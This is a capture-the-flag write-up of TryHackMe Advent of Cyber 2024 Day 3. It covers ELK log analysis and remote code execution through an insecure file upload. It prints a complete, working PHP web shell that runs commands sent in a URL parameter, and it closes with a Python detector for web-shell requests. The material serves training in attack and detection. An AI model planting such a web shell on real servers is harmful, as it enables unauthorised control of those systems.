THM - Advent of Cyber 2024 Day 3
Even if I wanted to go, their vulnerabilities wouldn’t allow it.
The Story
Today’s AoC challenge follows a rather unfortunate series of events for the Glitch. Here is a little passage which sets the scene for today’s task:
Late one Christmas evening the Glitch had a feeling,
Something forgotten as he stared at the ceiling.
He got up out of bed and decided to check,
A note on his wall: “Two days! InsnowSec”.
With a click and a type he got his hotel and tickets,
And sank off to sleep to the sound of some crickets.
Luggage in hand, he had arrived at Frosty Pines,
“To get to the conference, just follow the signs”.
Just as he was ready the Glitch got a fright,
An RCE vulnerability on their website?!?
He exploited it quick and made a report,
But before he could send arrived his transport.
In the Frosty Pines SOC they saw an alert,
This looked quite bad, they called an expert.
The request came from a room, but they couldn’t tell which,
The logs saved the day, it was the room of…the Glitch.
In this task, we will cover how the SOC team and their expert were able to find out what had happened (Operation Blue) and how the Glitch was able to gain access to the website in the first place (Operation Red). Let’s get started, shall we?
Learning Objectives
- Learn about log analysis and tools like ELK.
- Learn about KQL and how it can be used to investigate logs in ELK.
- Learn about RCE (Remote Code Execution) and how it can be achieved via an insecure file upload.
Answer the questions below
1- BLUE: Where was the web shell uploaded to?
Answer format: /directory/directory/directory/filename.php
Question Hint
Images are stored here.
2- BLUE: What IP address accessed the web shell?
Question Hint
Filter the IP values in ELK to determine their activity. Only one of them is malicious.
3- RED: What are the contents of flag.txt?
To access the Frosty Pines Resorts website (http://frostypines.thm), you will need to reference it in your hosts file. On the AttackBox, this can be done by executing the following command in a terminal: echo "10.10.57.139 frostypines.thm" >> /etc/hosts
Go To Login Page
Usage of Weak Credentials
We are now logged in with the admin account.
We go to the admin page, open the rooms section, and add a new room.
Now we upload the shell through the Browse box to obtain RCE.
Exploiting RCE via File Upload
Now we’re going to go through how this vulnerability can be exploited. For now, you can just read along; an opportunity to put this knowledge into practice is coming up. Once an RCE vulnerability that can be exploited via file upload has been identified, the next step is to create a malicious file that allows remote code execution once uploaded.
Below is an example PHP file which could be uploaded to exploit this vulnerability. Using your favourite text editor, copy and paste the code below and save it under any name you like with a .php extension.
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="text" name="command" autofocus id="command" size="50">
<input type="submit" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['command']))
{
system($_GET['command'] . ' 2>&1');
}
?>
</pre>
</body>
</html>
After uploading the shell, save the room.
Now we refresh the page and use the browser’s developer tools to find where the shell was saved.
We browse to that location and can now issue commands.
We use ls to list the files.
Here we have a file called flag.txt, which contains the flag. We display its contents with the cat command.
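The BLUE questions above ask where the shell was uploaded and which IP address used it. As an added example that is not part of the TryHackMe task or of this writeup, here is a small Python detector run over constructed access-log lines (the IPs, paths, hostnames and timestamps are all made up): it flags server-side scripts requested from a directory meant for static image uploads and records the query string, because the PHP shell shown above receives its command through a GET parameter.

```python
import re
from collections import Counter

# Constructed sample web-server access log lines (Apache combined format).
# Every IP, path and timestamp here is invented for this example.
SAMPLE_LOG = """\
10.9.0.5 - - [25/Dec/2024:21:03:11 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.9.0.5 - - [25/Dec/2024:21:03:40 +0000] "POST /admin/add_room.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.9.0.5 - - [25/Dec/2024:21:04:02 +0000] "GET /uploads/images/rooms/webshell.php?command=whoami HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.9.0.5 - - [25/Dec/2024:21:04:15 +0000] "GET /uploads/images/rooms/webshell.php?command=ls HTTP/1.1" 200 240 "-" "Mozilla/5.0"
10.9.0.7 - - [25/Dec/2024:21:05:00 +0000] "GET /uploads/images/rooms/room1.jpg HTTP/1.1" 200 40123 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Directories that should only ever serve static uploads (assumed layout);
# a server-side script executing from here is a strong web-shell indicator.
UPLOAD_DIRS = ("/uploads/images/",)
SCRIPT_EXTS = (".php", ".phtml", ".php5")

def parse_line(line):
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    path, _, query = d["path"].partition("?")
    d["path"], d["query"] = path, query
    return d

def find_web_shell_hits(log_text):
    """Return (ip, path, query, status) for requests that execute a script
    from an upload directory; the query string is kept because the shell
    on this page takes its command via the GET parameter 'command'."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        p = rec["path"].lower()
        if p.startswith(UPLOAD_DIRS) and p.endswith(SCRIPT_EXTS):
            hits.append((rec["ip"], rec["path"], rec["query"], rec["status"]))
    return hits

def summarise(log_text):
    """Map each suspicious script path to a count of requests per client IP."""
    by_path = {}
    for ip, path, _query, _status in find_web_shell_hits(log_text):
        by_path.setdefault(path, Counter())[ip] += 1
    return by_path
```

The same two filters (path prefix and script extension) map directly onto a KQL query in ELK, which is how the task expects the upload location and the calling IP to be found.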